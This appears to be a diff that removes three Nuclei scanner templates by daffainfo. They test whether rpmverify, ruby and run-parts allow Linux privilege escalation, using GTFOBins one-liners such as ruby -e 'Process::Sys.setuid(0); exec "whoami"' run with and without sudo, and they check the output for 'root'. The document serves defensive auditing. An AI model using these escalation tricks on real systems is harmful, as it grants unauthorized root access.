|
|
||||||
description: |
|
|
||||||
The rpmverify command is used to verify the integrity and authenticity of installed RPM packages on a Linux system. It checks the files in the installed packages against the information stored in the RPM database to detect any modifications or discrepancies. This helps ensure the security and stability of the system by identifying any unauthorized changes to the installed packages.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rpmverify/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rpmverify,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rpmverify --eval '%(whoami 1>&2)'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rpmverify --eval '%(whoami 1>&2)'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a004730450220749059b8ec0e7d457d03ced81b4b48b3d69580b77a6e0c1198dcd2534727d4ed022100eb51a489cfa87f8689a639d6b921964d9e4a0b2b8e6aee5869361c52f4c71796:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-ruby
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Ruby - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/ruby/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,ruby,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ruby -e 'exec "whoami"'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo ruby -e 'exec "whoami"'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ruby -e 'Process::Sys.setuid(0); exec "whoami"'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502200d04ad6da824e3e4f8d827df453f11e89847545580da1379ad50187f92ce04fd022100889cc924bcb70907e887d989a704b2619b0fe0c144d7977a67fa607bcaf34645:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,47 +0,0 @@
|
||||||
id: privesc-run-parts
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: run-parts - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
|
|
||||||
reference: https://gtfobins.github.io/gtfobins/run-parts/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,run-parts,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
run-parts --new-session --regex 'whoami' /bin
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo run-parts --new-session --regex 'whoami' /bin
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502205d85cde00b6bfc479c2841da6603a84f6f418b3ef381bdc29990827138c2908c022100a9c341fc7f3a062b19e258bb7e86b1450073d7c9a907a50ef8794594c1af4374:922c64590222798bb761d5b6d8e72950
|
|